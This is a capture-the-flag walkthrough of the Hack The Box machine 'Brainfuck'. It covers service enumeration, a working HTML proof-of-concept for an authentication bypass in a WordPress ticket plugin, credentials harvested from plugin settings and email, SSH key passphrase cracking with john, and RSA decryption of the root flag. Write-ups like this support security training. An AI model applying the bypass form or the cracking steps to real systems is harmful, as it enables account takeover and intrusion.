
Hack The Box - Brainfuck Writeup


IP: 10.10.10.17
OS: Linux
Difficulty: Insane
Release Date: 29 April 2017

Enumeration

As with any HackTheBox host the first step is to run an nmap scan.

nmap

kali@kali:~/Desktop/BrainFuck$ nmap -sC -sV -T4 -v 10.10.10.17
Starting Nmap 7.80 ( https://nmap.org ) at 
Scanning 10.10.10.17 [2 ports]
Completed Ping Scan at 11:12, 0.02s elapsed (1 total hosts)

Scanning 10.10.10.17 [1000 ports]
Discovered open port 22/tcp on 10.10.10.17
Discovered open port 110/tcp on 10.10.10.17
Discovered open port 443/tcp on 10.10.10.17
Discovered open port 143/tcp on 10.10.10.17
Discovered open port 25/tcp on 10.10.10.17

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: CAPA UIDL RESP-CODES USER SASL(PLAIN) TOP PIPELINING AUTH-RESP-CODE
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: SASL-IR OK ENABLE ID Pre-login have LITERAL+ post-login listed capabilities more IMAP4rev1 IDLE AUTH=PLAINA0001 LOGIN-REFERRALS
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-13T11:19:29
| Not valid after:  2027-04-11T11:19:29
| MD5:   cbf1 6899 96aa f7a0 0565 0fc0 9491 7f20
|_SHA-1: f448 e798 a817 5580 879c 8fb8 ef0e 2d3d c656 cb66
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 48.42 seconds

Working directory

While nmap is running we should create a directory to keep all of the files for this box organised. A new folder can be made on the desktop with the command mkdir /home/kali/Desktop/Brainfuck. All commands in this writeup are executed from this directory.

hosts file

The nmap scan shows two domain names in the SSL certificate on port 443. These should be added to the /etc/hosts file so that the virtual hosts can be reached. Add the lines below to that file.

10.10.10.17		brainfuck.htb
10.10.10.17		sup3rs3cr3t.brainfuck.htb
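Extracting the names by hand works for one certificate, but the same step comes up on every host with a TLS service. The helper below is an added example, not part of the writeup: it parses the commonName and Subject Alternative Name lines of nmap's ssl-cert output and emits the corresponding /etc/hosts lines. It also picks up www.brainfuck.htb, which the certificate lists but the writeup does not add. The sample input is the relevant part of the nmap output shown above, embedded so the script runs offline.

```python
# Added helper (not part of the writeup): pull the host names out of nmap's
# ssl-cert output and turn them into /etc/hosts lines for the target IP.
import re

# Constructed sample: the relevant lines of the nmap output shown above.
SAMPLE_NMAP = """\
Discovered open port 443/tcp on 10.10.10.17
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Issuer: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
"""


def cert_names(nmap_output):
    """Return the certificate's commonName followed by its DNS SANs, deduplicated, in order."""
    names = []
    # Only the Subject line is wanted; the Issuer line also carries a commonName.
    for m in re.finditer(r"ssl-cert: Subject: commonName=([^/\s]+)", nmap_output):
        names.append(m.group(1))
    for m in re.finditer(r"DNS:([^,\s]+)", nmap_output):
        names.append(m.group(1))
    seen, unique = set(), []
    for name in names:
        if name not in seen:
            seen.add(name)
            unique.append(name)
    return unique


def target_ip(nmap_output):
    """Target address as printed in nmap's 'Discovered open port ... on <ip>' lines."""
    m = re.search(r"Discovered open port \S+ on (\S+)", nmap_output)
    return m.group(1) if m else None


def hosts_lines(nmap_output):
    """One '<ip>\\t<name>' line per certificate name, ready to append to /etc/hosts."""
    ip = target_ip(nmap_output)
    return ["%s\t%s" % (ip, name) for name in cert_names(nmap_output)]


if __name__ == "__main__":
    print("\n".join(hosts_lines(SAMPLE_NMAP)))
```

Run it as `python3 hosts_from_nmap.py >> /etc/hosts` (with the real scan saved via `nmap -oN`) and every name in the certificate resolves to the target; this matters because nginx serves different content per virtual host, and a name you did not add is a site you never see.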

brainfuck.htb

Accessing https://brainfuck.htb in a web browser reveals a WordPress install. Judging from the content, this looks like a fresh install. There are posts visible by the user admin. To enumerate the install for plugins and vulnerabilities, wpscan was used.

wpscan

wpscan is run with the command wpscan --url https://brainfuck.htb --disable-tls-checks. The --disable-tls-checks switch is needed because the certificate is self-signed for a domain that does not really exist, so validation fails, and https:// must be given explicitly in the URL because there is no service on port 80 to redirect requests to 443.

wpscan --url https://brainfuck.htb --disable-tls-checks

---SNIP---

[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

wpscan reveals a plugin which is out of date.

searchsploit

Searchsploit is used to look for exploits for the vulnerable plugin.

kali@kali:~/Desktop/BrainFuck$ searchsploit wordpress support
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting                 | php/webapps/36338.txt
WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting                                   | php/webapps/45619.txt
WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting            | php/webapps/35218.txt
WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting                | php/webapps/40190.txt
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities      | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation        | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection               | php/webapps/40939.txt
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There are two exploits for version 7.1.3 of the WP Support Plus Responsive Ticket System plugin. The Privilege Escalation exploit is the one of interest. It can be copied to the working directory with searchsploit -m 41006.

Exploiting WordPress

WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation

The exploit .txt file explains that anyone can log in as any user because of incorrect usage of the wp_set_auth_cookie function, and provides a PoC for this exploit in the form of an HTML file.

exploit.html

Create a new file named exploit.html and paste in the modified PoC code below. For the exploit to work, the form action and the username input value have to be changed to match the target, as has been done here.

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

Run the exploit

To run the exploit, open exploit.html in a web browser. Submit the form and accept any certificate errors that appear. The result is a blank page, but loading the WordPress site again shows that the admin user is now logged in.

Getting Credentials

Looking through the WordPress install, there is an Easy WP SMTP plugin. Its settings page reveals the username and password of an SMTP user: the password field is populated with the plaintext value, which can be read in the page source. orestis:kHGuERB29DNiNE
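A settings page that writes a stored secret back into an input's value attribute hands that secret to anyone who can view the page, whatever the input type. The audit check below is an added example, not part of the writeup or of the plugin: it walks a page's HTML and flags inputs whose value is prefilled and whose type or name suggests a secret. The sample form is constructed, and the credential in it is a placeholder, not the box's.

```python
# Added audit check (not part of the writeup): flag settings pages that render a
# stored secret into an <input> value, which is how the SMTP password above ended
# up readable in the page source.
from html.parser import HTMLParser


class PrefilledSecretFinder(HTMLParser):
    """Collect <input> elements whose value is prefilled and whose type or name looks secret."""

    SECRET_HINTS = ("password", "passwd", "secret", "token", "api_key", "apikey")

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        # HTMLParser gives attrs as (name, value) pairs; value is None for bare attributes.
        a = {k.lower(): (v or "") for k, v in attrs}
        value = a.get("value", "")
        name = a.get("name", "").lower()
        looks_secret = (a.get("type", "").lower() == "password"
                        or any(hint in name for hint in self.SECRET_HINTS))
        # An empty value is the safe rendering ("leave blank to keep the current one").
        if looks_secret and value:
            self.findings.append((a.get("name", "?"), a.get("type", "text"), value))


def find_prefilled_secrets(html):
    """Return (field name, input type, leaked value) for every prefilled secret in the page."""
    parser = PrefilledSecretFinder()
    parser.feed(html)
    return parser.findings


# Constructed sample settings form; the credential is a placeholder, not the box's.
SAMPLE_FORM = """
<form method="post">
  <input type="text" name="smtp_username" value="mailuser">
  <input type="password" name="smtp_password" value="EXAMPLE-PLAINTEXT-PASSWORD">
  <input type="password" name="confirm_password" value="">
  <input type="hidden" name="api_token" value="EXAMPLE-TOKEN">
</form>
"""

if __name__ == "__main__":
    for field, typ, value in find_prefilled_secrets(SAMPLE_FORM):
        print("prefilled secret: field=%s type=%s value=%r" % (field, typ, value))
```

The hidden api_token field is flagged as well as the password field: type="password" only masks the value in the rendered form, and a hidden input does not even do that. The fix on the server side is to render such fields empty and treat an empty submission as "keep the stored value".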


Checking E-mails

With SMTP credentials it is now possible to read the e-mails stored on the server for that user by connecting to the POP3 server.

This is possible using telnet with the command telnet brainfuck.htb 110. Once connected, log in with the commands USER orestis and PASS kHGuERB29DNiNE. The command LIST lists the e-mails, and RETR <Mail Number> retrieves one for reading.


E-mail number 2 reveals user credentials.

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Login to Sup3rS3cr3t.brainfuck.htb

Using the credentials from the e-mail to log in to the forum reveals an exchange between the admin and a hacker named orestis. The hacker is asking the admin to share their SSH key. The hacker signs off every message with the same signature, Orestis - Hacking for fun and profit. The admin and hacker then take their discussion to an encrypted thread.

Finding the encryption

On the encrypted thread the hacker still signs off each message with the same signature. Each word in the encrypted signature has the same length as in the original, so the cipher only substitutes characters and keeps them in place. Because the encrypted signature differs in each reply, the cipher is something more elaborate than a fixed shift like ROT13. After some research on ciphers that use keys, it was found to be a keyed Vigenère. Using this link, the key used in the encryption can be worked out from the known signature.


The key turns out to be a repeating phrase. Using this website the message can be decrypted, but first the starting point of the key has to be found. After trying the words of the key in different orders, the correct order is found to be fuckmybrain. Using this as the key decrypts the URL of the SSH key.
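The two steps described above, recovering the key stream from the known signature and then finding where in the repeating key it starts, can be done without a website. The block below is an added example, not the writeup's own tooling: a plain repeating-key Vigenère in which non-letters pass through without consuming key letters (the convention most online tools use), a known-plaintext key-stream recovery, and a rotation search that picks the one alignment consistent with applying the key from the start of the message. The thread text is constructed; the key and the signature are the ones named in the writeup.

```python
# Added example (not from the writeup): a plain repeating-key Vigenère, which
# is the cipher the thread above turned out to use, plus the known-plaintext
# key recovery that the repeated signature makes possible.
import string

ALPHA = string.ascii_lowercase


def vigenere(text, key, decrypt=False):
    """Shift letters only; other characters pass through and do not consume key letters."""
    out, i = [], 0
    for ch in text:
        if ch.isalpha():
            k = ALPHA.index(key[i % len(key)].lower())
            base = ord("A") if ch.isupper() else ord("a")
            shift = -k if decrypt else k
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def recover_key_stream(known_plain, known_cipher):
    """Known plaintext: each key letter is (cipher - plain) mod 26, over the letters only."""
    return "".join(
        ALPHA[(ord(c.lower()) - ord(p.lower())) % 26]
        for p, c in zip(known_plain, known_cipher) if p.isalpha())


def find_period(stream):
    """Smallest period with which the recovered key stream repeats."""
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return period
    return len(stream)


def candidate_keys(stream):
    """Every rotation of the repeating unit: the signature can start anywhere in the key cycle."""
    unit = stream[:find_period(stream)]
    return [unit[r:] + unit[:r] for r in range(len(unit))]


def recover_key(ciphertext, signature):
    """Rotations of the recovered key that, applied from the start, still yield the signature."""
    stream = recover_key_stream(signature, ciphertext[-len(signature):])
    good = []
    for cand in candidate_keys(stream):
        # Only the rotation aligned with the message's letter count reproduces the signature.
        if vigenere(ciphertext, cand, decrypt=True).endswith(signature):
            good.append(cand)
    return good


# Constructed demo thread; the key and signature are the ones named in the writeup.
KEY = "fuckmybrain"
SIGNATURE = "Orestis - Hacking for fun and profit"
MESSAGE = "Send me the link to the key please.\n" + SIGNATURE
CIPHERTEXT = vigenere(MESSAGE, KEY)

if __name__ == "__main__":
    print("ciphertext:", CIPHERTEXT)
    print("recovered key:", recover_key(CIPHERTEXT, SIGNATURE))
    print("decrypted:", vigenere(CIPHERTEXT, KEY, decrypt=True))
```

The signature is 29 letters long and the key only 11, so the recovered stream shows the period directly; with a signature shorter than the key the period would be undetermined and more known text would be needed. The rotation search is what replaces the writeup's trial of word orders: the signature sits 27 letters into the message, so the stream read off it begins at key position 27 mod 11 = 5, and only the rotation that undoes that offset decrypts the whole thread consistently.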


SSH Login

The SSH key can be obtained by navigating to the decrypted link and downloading it. Save the file to the working directory.

Cracking the passphrase

The id_rsa file is protected by a passphrase that must be brute-forced.

Obtaining crackable hash

To turn the key into a format that can be used by cracking software it must be converted using ssh2john.py. This can be run with the command below.

/usr/share/john/ssh2john.py id_rsa > hash

Cracking the hash

Running john with the rockyou wordlist against the hash file created by ssh2john cracks the passphrase. This can be done using the command below.

sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt

After a few moments the password is cracked.


Login to SSH

To log in to the SSH server with the key, its permissions must be set first with chmod 600 id_rsa. It is then possible to connect with the command ssh orestis@brainfuck.htb -i id_rsa, entering the passphrase found by john when prompted. The session connects and the user flag is in the user's home directory.

Privilege Escalation

Once a user session is running, there are several files in the user's home directory. encrypt.sage is a script that prints the root flag in encrypted form; the encrypted flag is stored in output.txt. There is also a debug.txt containing what look like the values used in the encryption.

After some googling on the values and operations in the script, it is textbook RSA (p, q, e and the ciphertext are all present), and this Python script can be used to decrypt the value in output.txt.

Modifying the script

To make the script work a few changes must be made. The p, q and e values need to be replaced with the values in the debug.txt file, and the ct variable must be set to the contents of output.txt. The script is also modified to convert the hex output into plain text.

Modified script

def egcd(a, b):
    """Extended Euclid: returns (gcd, x, y) with a*x + b*y == gcd."""
    x, y, u, v = 0, 1, 1, 0
    while a != 0:
        q, r = b // a, b % a
        m, n = x - u * q, y - v * q
        b, a, x, y, u, v = a, r, u, v, m, n
    # b holds the gcd once a reaches 0 (returning it here also covers a == 0 on entry)
    return b, x, y


def main():

    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079

    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

    # compute n
    n = p * q

    # Compute phi(n)
    phi = (p - 1) * (q - 1)

    # Compute modular inverse of e: the x coefficient from egcd, reduced mod phi
    # so that d is positive (pow() with a negative exponent would not do RSA here)
    gcd, a, b = egcd(e, phi)
    if gcd != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    d = a % phi

    print("d:  " + str(d))

    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print("pt: " + str(pt))

    # Convert the integer plaintext back into bytes (Python 3 replacement for
    # format(pt, 'x').decode('hex'), which only works on Python 2)
    print("The flag is:")
    print(pt.to_bytes((pt.bit_length() + 7) // 8, "big").decode())


if __name__ == "__main__":
    main()

The root flag has been decrypted and the box is now complete.

This post is licensed under CC BY 4.0 by the author.